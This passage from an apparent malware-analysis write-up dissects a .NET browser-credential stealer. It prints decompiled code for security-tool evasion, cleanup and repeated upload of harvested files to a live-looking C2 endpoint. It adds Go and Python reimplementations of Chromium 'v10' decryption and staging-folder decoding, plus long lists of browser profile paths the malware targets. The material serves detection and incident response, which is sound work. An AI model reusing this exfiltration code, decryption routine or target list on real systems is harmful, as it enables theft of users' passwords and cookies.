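// which Chromium uses for session cookies) come out negative.
func WebKitToUnix(webkitMicros int64) int64 {
	return (webkitMicros - epochDeltaSeconds*1_000_000) / 1_000_000
}

// WebKitToTime renders a WebKit timestamp as RFC 3339 UTC.
func WebKitToTime(webkitMicros int64) string {
	return time.Unix(WebKitToUnix(webkitMicros), 0).UTC().Format(time.RFC3339)
}

// CookieRow holds the cookies-table columns DaritMolodost reads
// (constructed type; column numbers as in the decompiled code).
type CookieRow struct {
	HostKey    string // column 1
	Name       string // column 3
	Value      string // column 5, after Mulatka decryption
	Path       string // column 6
	ExpiresUTC int64  // column 7, WebKit microseconds (0 = session cookie)
	IsSecure   bool   // column 8
}

// csBool matches C# bool.ToString(), which is what the stealer writes.
// Netscape cookies.txt consumers usually expect upper-case TRUE/FALSE.
func csBool(b bool) string {
	if b {
		return "True"
	}
	return "False"
}

// NetscapeLine formats one cookie in the tab-separated layout DaritMolodost
// emits: host, include-subdomains flag (host begins with '.'), path, secure,
// expiry, name, value. For session cookies the stealer substitutes "one year
// from now"; here that substitute is in Unix seconds, whereas the decompiled
// code emits .NET ticks (100 ns units), so its lines carry an expiry about
// ten million times too large.
func NetscapeLine(c CookieRow, now time.Time) string {
	expiry := WebKitToUnix(c.ExpiresUTC)
	if expiry < 0 {
		expiry = now.AddDate(1, 0, 0).Unix()
	}
	fields := []string{
		c.HostKey,
		csBool(strings.HasPrefix(c.HostKey, ".")),
		c.Path,
		csBool(c.IsSecure),
		fmt.Sprint(expiry),
		c.Name,
		c.Value,
	}
	return strings.Join(fields, "\t")
}

// IsGoogleCookie reproduces the second-list filter in DaritMolodost.
func IsGoogleCookie(line string) bool {
	return strings.Contains(line, "google.") || strings.Contains(line, "youtube.")
}

func main() {
	// Constructed rows, not data from a real profile.
	rows := []CookieRow{
		{HostKey: ".example.com", Name: "sid", Value: "abc123", Path: "/", ExpiresUTC: 13300000000000000, IsSecure: true},
		{HostKey: "accounts.google.com", Name: "SSID", Value: "xyz", Path: "/", ExpiresUTC: 0, IsSecure: true},
	}
	now := time.Date(2024, 1, 1, 0, 0, 0, 0, time.UTC)
	for _, r := range rows {
		line := NetscapeLine(r, now)
		fmt.Printf("%s\tgoogle=%v\n", line, IsGoogleCookie(line))
	}
	fmt.Println(WebKitToTime(13300000000000000))
}
```

When reviewing a suspected exfiltration archive, tab-separated seven-field lines with "True"/"False" in the second and fourth columns and implausibly large expiry values in the fifth are a good sign the file came from this family’s cookie routine rather than from a legitimate cookies.txt export.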
The fourth class, Chechensy (evasion, cleanup and exfiltration):
using System;
using System.Diagnostics;
using System.IO;
using System.Linq;
using System.Net;
using System.Text;
using System.Threading;
namespace Ishimsky
{
// Token: 0x02000010 RID: 16
internal class Chechensy
{
// Token: 0x06000044 RID: 68 RVA: 0x00005758 File Offset: 0x00003958
public static void Chernika()
{
for (;;)
{
try
{
Process process = Enumerable.FirstOrDefault<Process>(Process.GetProcesses(), (Process p) => p.ProcessName == "MbaRun");
bool flag = process != null;
if (flag)
{
Environment.Exit(0);
}
Thread.Sleep(50);
}
catch
{
}
}
}
// Token: 0x06000045 RID: 69 RVA: 0x000057CC File Offset: 0x000039CC
public static string Cleaner()
{
try
{
bool flag = File.Exists(ModelGeev.patriarh + ".xexe");
if (flag)
{
File.Delete(ModelGeev.patriarh + ".xexe");
}
bool flag2 = File.Exists(ModelGeev.patriarh + "XE");
if (flag2)
{
File.Delete(ModelGeev.patriarh + "XE");
}
bool flag3 = Directory.Exists(ModelGeev.patriarh);
if (flag3)
{
Directory.Delete(ModelGeev.patriarh, true);
}
}
catch
{
}
return "True";
}
// Token: 0x06000046 RID: 70 RVA: 0x00005878 File Offset: 0x00003A78
public static void Catafalk(string cons, string miklejackson)
{
try
{
WebClient webClient = new WebClient();
webClient.Headers.Add("Content-Type", "binary/octet-stream");
webClient.Headers.Add("TimeStamp", cons);
webClient.Headers.Add("Cookie", Convert.ToBase64String(Encoding.UTF8.GetBytes(ModelGeev.Rukavica)));
webClient.UploadFile("https://master.hdsjfkgsadoghdsiougds.space/index2.php", "POST", miklejackson);
}
catch
{
try
{
WebClient webClient2 = new WebClient();
webClient2.Headers.Add("Content-Type", "binary/octet-stream");
webClient2.Headers.Add("TimeStamp", cons);
webClient2.Headers.Add("Cookie", Convert.ToBase64String(Encoding.UTF8.GetBytes(ModelGeev.Rukavica)));
webClient2.UploadFile("https://master.hdsjfkgsadoghdsiougds.space/index2.php", "POST", miklejackson);
}
catch
{
try
{
WebClient webClient3 = new WebClient();
webClient3.Headers.Add("Content-Type", "binary/octet-stream");
webClient3.Headers.Add("TimeStamp", cons);
webClient3.Headers.Add("Cookie", Convert.ToBase64String(Encoding.UTF8.GetBytes(ModelGeev.Rukavica)));
webClient3.UploadFile("https://master.hdsjfkgsadoghdsiougds.space/index2.php", "POST", miklejackson);
}
catch
{
WebClient webClient4 = new WebClient();
webClient4.Headers.Add("Content-Type", "binary/octet-stream");
webClient4.Headers.Add("TimeStamp", cons);
webClient4.Headers.Add("Cookie", Convert.ToBase64String(Encoding.UTF8.GetBytes(ModelGeev.Rukavica)));
webClient4.UploadFile("https://master.hdsjfkgsadoghdsiougds.space/index2.php", "POST", miklejackson);
}
}
}
}
}
}
Chernika() method: loops forever, every 50 ms enumerating processes and calling Environment.Exit(0) if one named MbaRun is running. This is an evasion check against a specific security tool, identified here only by its process name.
Cleaner() method: deletes <ModelGeev.patriarh>.xexe, <ModelGeev.patriarh>XE and the ModelGeev.patriarh directory if they exist (patriarh is a staging path defined in a configuration class that is not shown), then returns "True" regardless of outcome. It removes the stealer’s own working files once collection is done.
Catafalk(string cons, string miklejackson) method: uploads the file miklejackson to hxxps[://]master[.]hdsjfkgsadoghdsiougds[.]space/index2.php with WebClient.UploadFile, setting three headers: Content-Type "binary/octet-stream", TimeStamp = cons, and Cookie = Base64(ModelGeev.Rukavica), a static value from the configuration class. The nested try/catch blocks give four attempts in total; the repeated destination is the data-exfiltration (C2) endpoint.
Two details matter for detection. WebClient.UploadFile always sends a multipart/form-data body, and a Content-Type set on the client becomes the Content-Type of the file part inside that body, so "binary/octet-stream" (which is not a registered media type) appears in the multipart part header rather than in the request header. And the Cookie header carries a single Base64 token instead of name=value pairs, next to a custom TimeStamp header; both are cheap hunting pivots in proxy logs or packet captures.
The fifth class, Cloun (AES-GCM decryption through Windows CNG):
using System;
using System.Linq;
using System.Runtime.InteropServices;
using System.Text;
namespace Ishimsky
{
// Token: 0x0200000F RID: 15
public class Cloun
{
// Token: 0x0600003D RID: 61 RVA: 0x000054C4 File Offset: 0x000036C4
public byte[] DDC(byte[] key, byte[] iv, byte[] aad, byte[] cipherText, byte[] authTag)
{
IntPtr intPtr = Cloun.OpenAlgorithmProvider("AES", "Microsoft Primitive Provider", "ChainingModeGCM");
IntPtr hKey;
IntPtr hglobal = Cloun.ImportKey(intPtr, key, out hKey);
NaMne.BCRYPT_AUTHENTICATED_CIPHER_MODE_INFO bcrypt_AUTHENTICATED_CIPHER_MODE_INFO = new NaMne.BCRYPT_AUTHENTICATED_CIPHER_MODE_INFO(iv, aad, authTag);
byte[] array2;
using (bcrypt_AUTHENTICATED_CIPHER_MODE_INFO)
{
byte[] array = new byte[Cloun.MaxAuthTagSize(intPtr)];
int num = 0;
uint num2 = NaMne.BCryptDecrypt(hKey, cipherText, cipherText.Length, ref bcrypt_AUTHENTICATED_CIPHER_MODE_INFO, array, array.Length, null, 0, ref num, 0);
array2 = new byte[num];
num2 = NaMne.BCryptDecrypt(hKey, cipherText, cipherText.Length, ref bcrypt_AUTHENTICATED_CIPHER_MODE_INFO, array, array.Length, array2, array2.Length, ref num, 0);
}
NaMne.BCryptDestroyKey(hKey);
Marshal.FreeHGlobal(hglobal);
NaMne.BCryptCloseAlgorithmProvider(intPtr, 0U);
return array2;
}
// Token: 0x0600003E RID: 62 RVA: 0x00005590 File Offset: 0x00003790
private static int MaxAuthTagSize(IntPtr hAlg)
{
byte[] property = Cloun.GetProperty(hAlg, "AuthTagLength");
return BitConverter.ToInt32(new byte[]
{
property[4],
property[5],
property[6],
property[7]
}, 0);
}
// Token: 0x0600003F RID: 63 RVA: 0x000055D4 File Offset: 0x000037D4
private static IntPtr OpenAlgorithmProvider(string alg, string provider, string chainingMode)
{
IntPtr zero = IntPtr.Zero;
uint num = NaMne.BCryptOpenAlgorithmProvider(out zero, alg, provider, 0U);
byte[] bytes = Encoding.Unicode.GetBytes(chainingMode);
num = NaMne.BCryptSetAlgorithmProperty(zero, "ChainingMode", bytes, bytes.Length, 0);
return zero;
}
// Token: 0x06000040 RID: 64 RVA: 0x00005618 File Offset: 0x00003818
public static byte[] Concat(params byte[][] arrays)
{
byte[] array = new byte[Enumerable.Sum<byte[]>(arrays, (byte[] a) => (a != null) ? a.Length : 0)];
int num = 0;
foreach (byte[] array2 in arrays)
{
bool flag = array2 == null;
if (!flag)
{
Buffer.BlockCopy(array2, 0, array, num, array2.Length);
num += array2.Length;
}
}
return array;
}
// Token: 0x06000041 RID: 65 RVA: 0x00005698 File Offset: 0x00003898
private static IntPtr ImportKey(IntPtr hAlg, byte[] key, out IntPtr hKey)
{
byte[] property = Cloun.GetProperty(hAlg, "ObjectLength");
int num = BitConverter.ToInt32(property, 0);
IntPtr intPtr = Marshal.AllocHGlobal(num);
byte[] array = Cloun.Concat(new byte[][]
{
BitConverter.GetBytes(1296188491),
BitConverter.GetBytes(1),
BitConverter.GetBytes(key.Length),
key
});
uint num2 = NaMne.BCryptImportKey(hAlg, IntPtr.Zero, "KeyDataBlob", out hKey, intPtr, num, array, array.Length, 0U);
return intPtr;
}
// Token: 0x06000042 RID: 66 RVA: 0x00005714 File Offset: 0x00003914
private static byte[] GetProperty(IntPtr hAlg, string name)
{
int num = 0;
uint num2 = NaMne.BCryptGetProperty(hAlg, name, null, 0, ref num, 0U);
byte[] array = new byte[num];
num2 = NaMne.BCryptGetProperty(hAlg, name, array, array.Length, ref num, 0U);
return array;
}
}
}
DDC() method: decrypts AES-GCM data through CNG (bcrypt.dll), using P/Invoke declarations in the NaMne class (not shown). It opens the AES provider in GCM mode, imports the raw key, fills a BCRYPT_AUTHENTICATED_CIPHER_MODE_INFO with the nonce, the AAD (null here) and the authentication tag, and calls BCryptDecrypt twice: first with a null output buffer to learn the plaintext size, then again to decrypt into a buffer of that size. The 16-byte array from MaxAuthTagSize is passed as the IV scratch buffer the API requires. The status codes (num2) are never checked, so a wrong key or a tampered tag yields an empty or meaningless result rather than an exception; callers only notice through the try/catch blocks in Bulkonit.
MaxAuthTagSize() method: queries the provider’s AuthTagLength property, which returns a BCRYPT_AUTH_TAG_LENGTHS_STRUCT (dwMinLength, dwMaxLength, dwIncrement), and reads bytes 4 to 7, i.e. dwMaxLength (16 for GCM).
OpenAlgorithmProvider() method: calls BCryptOpenAlgorithmProvider for "AES" from the "Microsoft Primitive Provider", then sets the ChainingMode property to the UTF-16 string "ChainingModeGCM".
Concat() method: concatenates byte arrays, skipping nulls; used to assemble the key blob.
ImportKey() method: builds a BCRYPT_KEY_DATA_BLOB by hand: the magic 1296188491 (0x4D42444B, "KDBM"), version 1, the key length and the key bytes, and imports it with BCryptImportKey as a "KeyDataBlob" into a key object sized from the ObjectLength property. It returns the unmanaged buffer so DDC can free it.
GetProperty() method: the usual two-call pattern, first to get the size and then to fetch the value of a provider property such as ObjectLength or AuthTagLength.
Put together with BUBEL and Mulatka, this is the Chromium “v10” decryptor: a 12-byte nonce taken from the stored value, a 32-byte AES key recovered from Local State, no additional authenticated data, and a 16-byte tag.
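BUBEL, Mulatka and Cloun.DDC together implement Chromium’s “v10” decryption. The Go program below is an added example, not code from the page or the malware, that reimplements that pipeline portably so the layout can be verified against a profile offline: it strips the "DPAPI" prefix from os_crypt.encrypted_key the way Mulatka does, splits a value into prefix, 12-byte nonce, ciphertext and 16-byte tag the way BUBEL does, and decrypts with AES-256-GCM as DDC does. The DPAPI unprotect step (ProtectedData.Unprotect) is Windows-only and is assumed to have been done by the caller, so DecryptV10 takes the 32-byte key directly; the key and plaintext in main are constructed test data, and EncryptV10 exists only to produce them.

```go
package main

import (
	"bytes"
	"crypto/aes"
	"crypto/cipher"
	"crypto/rand"
	"encoding/base64"
	"errors"
	"fmt"
)

// A Chromium "v10"/"v11" value, as BUBEL slices it:
//   [0:3]   version prefix
//   [3:15]  12-byte AES-GCM nonce        (BUBEL's `array`)
//   [15:]   ciphertext || 16-byte GCM tag (BUBEL's `array4` and `array3`)
const (
	prefixLen = 3
	nonceLen  = 12
	tagLen    = 16
)

// MasterKeyBlobFromLocalState does what Mulatka does with the key string:
// Base64-decode os_crypt.encrypted_key and drop the 5-byte "DPAPI" prefix.
// What remains is a DPAPI blob; unprotecting it (ProtectedData.Unprotect,
// BenzoPilaka.DCB) only works as the victim user on the victim host and is
// left to the caller.
func MasterKeyBlobFromLocalState(encryptedKeyB64 string) ([]byte, error) {
	raw, err := base64.StdEncoding.DecodeString(encryptedKeyB64)
	if err != nil {
		return nil, err
	}
	if !bytes.HasPrefix(raw, []byte("DPAPI")) {
		return nil, errors.New("encrypted_key lacks the DPAPI prefix")
	}
	return raw[5:], nil
}

// SplitV10 returns nonce and ciphertext||tag, rejecting malformed values.
func SplitV10(value []byte) (nonce, ctWithTag []byte, err error) {
	if len(value) < prefixLen+nonceLen+tagLen {
		return nil, nil, errors.New("value too short for v10 layout")
	}
	if string(value[:2]) != "v1" { // Mulatka's check: value[0]=='v' && value[1]=='1'
		return nil, nil, fmt.Errorf("unexpected prefix %q", value[:prefixLen])
	}
	return value[prefixLen : prefixLen+nonceLen], value[prefixLen+nonceLen:], nil
}

// DecryptV10 is the portable equivalent of BUBEL + Cloun.DDC: AES-256-GCM,
// no AAD. Unlike DDC, which ignores BCryptDecrypt's status, a wrong key or a
// tampered tag is reported as an error.
func DecryptV10(masterKey, value []byte) ([]byte, error) {
	nonce, ct, err := SplitV10(value)
	if err != nil {
		return nil, err
	}
	block, err := aes.NewCipher(masterKey)
	if err != nil {
		return nil, err
	}
	gcm, err := cipher.NewGCM(block)
	if err != nil {
		return nil, err
	}
	return gcm.Open(nil, nonce, ct, nil)
}

// EncryptV10 builds a value in the same layout. It exists only to create
// constructed test data here; no browser profile is read.
func EncryptV10(masterKey, plaintext []byte) ([]byte, error) {
	block, err := aes.NewCipher(masterKey)
	if err != nil {
		return nil, err
	}
	gcm, err := cipher.NewGCM(block)
	if err != nil {
		return nil, err
	}
	nonce := make([]byte, nonceLen)
	if _, err := rand.Read(nonce); err != nil {
		return nil, err
	}
	out := append([]byte("v10"), nonce...)
	return gcm.Seal(out, nonce, plaintext, nil), nil
}

func main() {
	key := bytes.Repeat([]byte{0x42}, 32) // constructed 32-byte key, not a real one
	value, err := EncryptV10(key, []byte("hunter2"))
	if err != nil {
		panic(err)
	}
	pt, err := DecryptV10(key, value)
	fmt.Printf("decrypted %q, err=%v\n", pt, err)
	value[len(value)-1] ^= 0xff // flip a tag bit: GCM must now fail
	_, err = DecryptV10(key, value)
	fmt.Println("after tampering:", err)
}
```

The tamper check at the end is the practical difference from the malware’s implementation: with the status codes ignored, DDC cannot tell a corrupted record from a valid one, which is one reason stealer output often contains blank password fields for entries the browser itself still decrypts fine.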
The sixth class, FilveM (file and browser-profile discovery):
using System;
using System.Collections.Generic;
using System.IO;
namespace Ishimsky
{
// Token: 0x0200000B RID: 11
internal class FilveM
{
// Token: 0x0600001F RID: 31 RVA: 0x000037B4 File Offset: 0x000019B4
public static List<string> DirTester(string test, string[] file)
{
List<string> list = new List<string>();
FilveM.ptlg = new List<string>();
bool flag = Directory.Exists(test);
if (flag)
{
foreach (string searchPattern in file)
{
try
{
foreach (string text in Directory.GetFiles(test, searchPattern, SearchOption.AllDirectories))
{
string fullName = new FileInfo(text).Directory.FullName;
bool flag2 = !list.Contains(fullName);
if (flag2)
{
FilveM.ptlg.Add(text);
list.Add(text);
}
}
}
catch
{
try
{
foreach (string path in FilveM.TrapBang)
{
bool flag3 = Directory.Exists(Path.Combine(test, path));
if (flag3)
{
foreach (string text2 in Directory.GetFiles(Path.Combine(test, path), searchPattern))
{
string fullName2 = new FileInfo(text2).Directory.FullName;
bool flag4 = !list.Contains(fullName2);
if (flag4)
{
FilveM.ptlg.Add(text2);
list.Add(text2);
}
}
}
}
}
catch
{
}
}
}
}
return FilveM.ptlg;
}
// Token: 0x06000020 RID: 32 RVA: 0x00003948 File Offset: 0x00001B48
public static List<string> LocTester(string test, string[] file)
{
List<string> list = new List<string>();
bool flag = Directory.Exists(test);
if (flag)
{
foreach (string searchPattern in file)
{
try
{
foreach (string item in Directory.GetFiles(test, searchPattern, SearchOption.AllDirectories))
{
bool flag2 = !list.Contains(item);
if (flag2)
{
list.Add(item);
}
}
}
catch
{
try
{
foreach (string path in FilveM.TrapBang)
{
bool flag3 = Directory.Exists(Path.Combine(test, path));
if (flag3)
{
foreach (string item2 in Directory.GetFiles(Path.Combine(test, path), searchPattern))
{
bool flag4 = !list.Contains(item2);
if (flag4)
{
list.Add(item2);
}
}
}
}
}
catch
{
}
}
}
}
return list;
}
// Token: 0x06000021 RID: 33 RVA: 0x00003A88 File Offset: 0x00001C88
public static string CGN(string path)
{
try
{
string[] array = path.Split(new char[]
{
'\\'
}, StringSplitOptions.RemoveEmptyEntries);
bool flag = array[array.Length - 2].Contains("User Data");
bool flag2 = flag;
if (flag2)
{
return array[array.Length - 1];
}
}
catch
{
}
return "Unknown";
}
// Token: 0x06000022 RID: 34 RVA: 0x00003AF0 File Offset: 0x00001CF0
public static string ChrRm(string path)
{
try
{
return path.Split(new string[]
{
"AppData\\Roaming\\"
}, StringSplitOptions.RemoveEmptyEntries)[1].Split(new char[]
{
'\\'
}, StringSplitOptions.RemoveEmptyEntries)[0];
}
catch
{
}
return string.Empty;
}
// Token: 0x06000023 RID: 35 RVA: 0x00003B4C File Offset: 0x00001D4C
public static string ChrLm(string path)
{
try
{
string[] array = path.Split(new string[]
{
"AppData\\Local\\"
}, StringSplitOptions.RemoveEmptyEntries)[1].Split(new char[]
{
'\\'
}, StringSplitOptions.RemoveEmptyEntries);
return array[0] + "_[" + array[1] + "]";
}
catch
{
}
return string.Empty;
}
// Token: 0x04000008 RID: 8
public static string[] TrapBang = new string[]
{
"Default",
"Profile 1",
"Profile 2",
"Profile 3",
"Profile 4",
"Profile 5",
"Profile 6",
"Profile 7",
"Profile 8",
"Profile 9",
"Profile 10",
"Profile 11"
};
// Token: 0x04000009 RID: 9
public static List<string> ptlg = new List<string>();
}
}
DirTester(string test, string[] file):
- Searches the given test directory and its subdirectories for files matching the patterns in the file array.
- Adds the files it finds to a static list (ptlg), keeping a second list so that the same directory is not added multiple times.
- If the initial search throws, it falls back to the predefined subdirectories in the TrapBang array and searches for files there.
- Returns the list of found files (ptlg).
LocTester(string test, string[] file):
- Similar to DirTester, this method searches a directory (test) and its subdirectories for files matching the patterns in the file array.
- Instead of tracking directory names, it adds the file paths directly to a local list and returns that list.
- It also falls back to the TrapBang subdirectories if the initial search fails.
CGN(string path):
- Takes a file path and checks whether the second-to-last directory in the path contains “User Data”.
- If so, it returns the name of the last directory in the path (which could represent a user profile or data directory).
- If the condition is not met, it returns “Unknown”.
ChrRm(string path):
- Extracts the part of the path after “AppData\Roaming\” and returns the first directory following that segment.
- This identifies the application-specific directory in the Roaming folder.
ChrLm(string path):
- Extracts the part of the path after “AppData\Local\”.
- It returns a string of the form folder1_[folder2], built from the first two directories after AppData\Local.
- This is used to differentiate between applications and profiles within the Local directory.
Fields:
TrapBang:
- An array of predefined folder names representing browser profiles (Default, Profile 1 through Profile 11).
- Used as fallback locations when the initial search fails.
ptlg:
- A static list that holds the file paths found by the DirTester method.
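The FilveM helpers above decide how the stealer names its staging folders, and Nurminsky.Anpelgolds (shown later on the page) combines them: Opera GX is special-cased, paths under Roaming go through ChrRm and paths under Local through ChrLm, the first letter is upper-cased and CGN’s profile name is appended; copies are then written there under an eight-letter random name (RandomName(8)) with the extension .loda (Login Data), .weda (Web Data) or .coco (Cookies). The following is an added example for this write-up, not the stealer’s code: it ports the three helpers to Python with the same failure behaviour (swallowed exceptions, “Unknown”/empty results) so that, during incident response, a folder such as Google_[Chrome]_Default found in the staging directory can be mapped back to the browser and profile it was taken from. All sample paths are constructed.

```python
"""Decoding the stealer's staging-directory names during incident response.

Added example for this write-up, not the stealer's code. Ports FilveM.CGN,
FilveM.ChrRm and FilveM.ChrLm and applies the naming rule of
Nurminsky.Anpelgolds; sample paths are constructed.
"""
import re


def _split(s, sep):
    """C# String.Split(sep, StringSplitOptions.RemoveEmptyEntries)."""
    return [p for p in s.split(sep) if p]


def cgn(path):
    """FilveM.CGN: last component when the one before it contains 'User Data'."""
    try:
        parts = _split(path, "\\")
        if "User Data" in parts[-2]:
            return parts[-1]
    except IndexError:
        pass
    return "Unknown"


def chr_rm(path):
    """FilveM.ChrRm: first directory below AppData\\Roaming, '' on failure."""
    try:
        return _split(_split(path, "AppData\\Roaming\\")[1], "\\")[0]
    except IndexError:
        return ""


def chr_lm(path):
    """FilveM.ChrLm: 'first_[second]' below AppData\\Local, '' on failure."""
    try:
        parts = _split(_split(path, "AppData\\Local\\")[1], "\\")
        return parts[0] + "_[" + parts[1] + "]"
    except IndexError:
        return ""


def staging_folder(source_file):
    """Folder name Anpelgolds creates for one harvested file, or None when the
    stealer would throw (empty label => text3[0] fails) and skip the path."""
    directory = source_file.rsplit("\\", 1)[0]
    if "Opera GX Stable" in directory:          # checked on the directory
        label = "Opera GX Stable"
    elif "Roaming" in source_file:              # checked on the file path
        label = chr_rm(directory)
    else:
        label = chr_lm(directory)
    if not label:
        return None
    return label[0].upper() + label[1:] + "_" + cgn(directory)


STAGED_FILE = re.compile(r"^[a-z]{8}\.(loda|weda|coco)$")  # RandomName(8) + type
DATA_TYPES = {"loda": "Login Data", "weda": "Web Data", "coco": "Cookies"}


def staged_file_type(file_name):
    """Original file type for a staged copy's name, or None if not a staged copy."""
    m = STAGED_FILE.match(file_name)
    return DATA_TYPES[m.group(1)] if m else None


def decode_listing(entries):
    """'folder\\file' entries relative to the staging root -> [(folder, type)]."""
    decoded = []
    for entry in entries:
        folder, _, file_name = entry.rpartition("\\")
        kind = staged_file_type(file_name)
        if kind:
            decoded.append((folder, kind))
    return decoded


# Constructed inputs.
SAMPLE_SOURCES = [
    r"C:\Users\alice\AppData\Local\Google\Chrome\User Data\Default\Login Data",
    r"C:\Users\alice\AppData\Local\BraveSoftware\Brave-Browser\User Data\Profile 1\Cookies",
    r"C:\Users\alice\AppData\Roaming\Opera Software\Opera GX Stable\Web Data",
    r"C:\Users\alice\AppData\Local\Steam\Login Data",   # one level only: ChrLm fails
]
SAMPLE_LISTING = [
    r"Google_[Chrome]_Default\qwertyui.loda",
    r"Google_[Chrome]_Default\zxcvbnml.coco",
    r"Cookies\Chrome_[1].txt",                          # not a staged copy
]

if __name__ == "__main__":
    for src in SAMPLE_SOURCES:
        print(src, "->", staging_folder(src))
    print(decode_listing(SAMPLE_LISTING))
```

Two quirks worth knowing when reading a staging directory: a Chromium browser that sits directly under AppData\Local (for example Chromium\User Data) gets “User Data” as its second component, so its folder reads Chromium_[User Data]_Default, and any source whose directory is only one level below AppData\Local yields an empty label, which makes the stealer throw and skip that browser entirely.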
Data harvesting
The stealer harvests user data from the following paths, which cover Mozilla-based applications such as Firefox, Thunderbird and Pale Moon as well as lesser-known browsers like K-Meleon and Cyberfox. These paths are typically located under the user’s AppData\Roaming folder; the %PAPAGEY% placeholder is replaced with the user profile directory at run time.
"%PAPAGEY%\\AppData\\Roaming\\Mozilla\\Firefox",
"%PAPAGEY%\\AppData\\Roaming\\Waterfox",
"%PAPAGEY%\\AppData\\Roaming\\K-Meleon",
"%PAPAGEY%\\AppData\\Roaming\\Thunderbird",
"%PAPAGEY%\\AppData\\Roaming\\Comodo\\IceDragon",
"%PAPAGEY%\\AppData\\Roaming\\8pecxstudios\\Cyberfox",
"%PAPAGEY%\\AppData\\Roaming\\NETGATE Technologies\\BlackHaw",
"%PAPAGEY%\\AppData\\Roaming\\Moonchild Productions\\Pale Moon",
"%PAPAGEY%\\AppData\\Roaming\\Ghostery Browser\\Profiles",
"%PAPAGEY%\\AppData\\Roaming\\Undetectable\\Profiles",
"%PAPAGEY%\\AppData\\Roaming\\Sielo\\profiles",
"%PAPAGEY%\\AppData\\Roaming\\Waterfox\\Profiles",
"%PAPAGEY%\\AppData\\Roaming\\conkeror.mozdev.org\\conkeror",
"%PAPAGEY%\\AppData\\Roaming\\Netscape\\Navigator",
"%PAPAGEY%\\AppData\\Roaming\\Mozilla\\SeaMonkey",
"%PAPAGEY%\\AppData\\Roaming\\FlashPeak\\SlimBrowser",
"%PAPAGEY%\\AppData\\Roaming\\Avant Profiles",
"%PAPAGEY%\\AppData\\Roaming\\Flock"
It then gathers data from the paths of various Chromium-based browsers, including Google Chrome, Opera, Brave and alternatives like Vivaldi and Yandex. The list also includes directories for gaming and other software, indicating where user data might be stored locally.
"%PAPAGEY%\\AppData\\Local\\Battle.net",
"%PAPAGEY%\\AppData\\Local\\Google\\Chrome\\User Data",
"%PAPAGEY%\\AppData\\Local\\Google(x86)\\Chrome\\User Data",
"%PAPAGEY%\\AppData\\Roaming\\Opera Software\\Opera GX Stable",
"%PAPAGEY%\\AppData\\Roaming\\Opera Software\\Opera Stable",
"%PAPAGEY%\\AppData\\Local\\Microsoft\\Edge\\User Data",
"%PAPAGEY%\\AppData\\Local\\BraveSoftware\\Brave-Browser\\User Data",
"%PAPAGEY%\\AppData\\Local\\Chromium\\User Data",
"%PAPAGEY%\\AppData\\Local\\Slimjet\\User Data",
"%PAPAGEY%\\AppData\\Local\\MapleStudio\\ChromePlus\\User Data",
"%PAPAGEY%\\AppData\\Local\\Iridium\\User Data",
"%PAPAGEY%\\AppData\\Local\\7Star\\7Star\\User Data",
"%PAPAGEY%\\AppData\\Local\\CentBrowser\\User Data",
"%PAPAGEY%\\AppData\\Local\\Chedot\\User Data",
"%PAPAGEY%\\AppData\\Local\\Vivaldi\\User Data",
"%PAPAGEY%\\AppData\\Local\\Kometa\\User Data",
"%PAPAGEY%\\AppData\\Local\\Elements Browser\\User Data",
"%PAPAGEY%\\AppData\\Local\\Epic Privacy Browser\\User Data",
"%PAPAGEY%\\AppData\\Local\\uCozMedia\\Uran\\User Data",
"%PAPAGEY%\\AppData\\Local\\Fenrir Inc\\Sleipnir5\\setting\\modules\\ChromiumViewer",
"%PAPAGEY%\\AppData\\Local\\CatalinaGroup\\Citrio\\User Data",
"%PAPAGEY%\\AppData\\Local\\Coowon\\Coowon\\User Data",
"%PAPAGEY%\\AppData\\Local\\liebao\\User Data",
"%PAPAGEY%\\AppData\\Local\\QIP Surf\\User Data",
"%PAPAGEY%\\AppData\\Local\\Orbitum\\User Data",
"%PAPAGEY%\\AppData\\Local\\Comodo\\Dragon\\User Data",
"%PAPAGEY%\\AppData\\Local\\Amigo\\User\\User Data",
"%PAPAGEY%\\AppData\\Local\\Torch\\User Data",
"%PAPAGEY%\\AppData\\Local\\Yandex\\YandexBrowser\\User Data",
"%PAPAGEY%\\AppData\\Local\\Comodo\\User Data",
"%PAPAGEY%\\AppData\\Local\\360Browser\\Browser\\User Data",
"%PAPAGEY%\\AppData\\Local\\Maxthon3\\User Data",
"%PAPAGEY%\\AppData\\Local\\K-Melon\\User Data",
"%PAPAGEY%\\AppData\\Local\\Sputnik\\Sputnik\\User Data",
"%PAPAGEY%\\AppData\\Local\\Nichrome\\User Data",
"%PAPAGEY%\\AppData\\Local\\CocCoc\\Browser\\User Data",
"%PAPAGEY%\\AppData\\Local\\Uran\\User Data",
"%PAPAGEY%\\AppData\\Local\\Chromodo\\User Data",
"%PAPAGEY%\\AppData\\Local\\Mail.Ru\\Atom\\User Data",
"%PAPAGEY%\\AppData\\Local\\Steam",
"%PAPAGEY%\\AppData\\Local\\CryptoTab Browser",
"%PAPAGEY%\\AppData\\Local\\MapleStudio\\ChromePlus",
"%PAPAGEY%\\AppData\\Local\\Coowon\\Coowon",
"%PAPAGEY%\\AppData\\Local\\GhostBrowser",
"%PAPAGEY%\\AppData\\Local\\BitTorrent\\Maelstrom",
"%PAPAGEY%\\AppData\\Local\\Min\\User Data",
"%PAPAGEY%\\AppData\\Local\\Kinza\\User Data",
"%PAPAGEY%\\AppData\\Local\\Globus VPN\\User Data",
"%PAPAGEY%\\AppData\\Roaming\\Falkon\\Profiles",
"%PAPAGEY%\\AppData\\Local\\Element Browser\\User Data",
"%PAPAGEY%\\AppData\\Local\\ColibriBrowser",
"%PAPAGEY%\\AppData\\Local\\Naver\\Naver Whale\\User Data",
"%PAPAGEY%\\AppData\\Local\\AVAST Software\\Browser\\User Data",
"%PAPAGEY%\\AppData\\Local\\UCBrowser\\User Data_i18n",
"%PAPAGEY%\\AppData\\Local\\Maxthon\\User Data",
"%PAPAGEY%\\AppData\\Local\\Blisk\\User Data",
"%PAPAGEY%\\AppData\\Local\\AOL\\AOL Shield\\User Data",
"%PAPAGEY%\\AppData\\Local\\Baidu\\BaiduBrowser\\User Data",
"%PAPAGEY%\\AppData\\Local\\CCleaner Browser\\User Data",
"%PAPAGEY%\\AppData\\Roaming\\Hola\\chromium_profile",
"%PAPAGEY%\\AppData\\Local\\360Chrome\\Chrome\\User Data",
"%PAPAGEY%\\AppData\\Local\\BraveSoftware\\Brave-Browser-Nightly\\User Data",
"%PAPAGEY%\\AppData\\Roaming\\Lulumi-browser",
"%PAPAGEY%\\AppData\\Local\\Xvast\\User Data",
"%PAPAGEY%\\AppData\\Roaming\\kingpinbrowser",
"%PAPAGEY%\\AppData\\Local\\Tencent\\QQBrowser\\User Data"
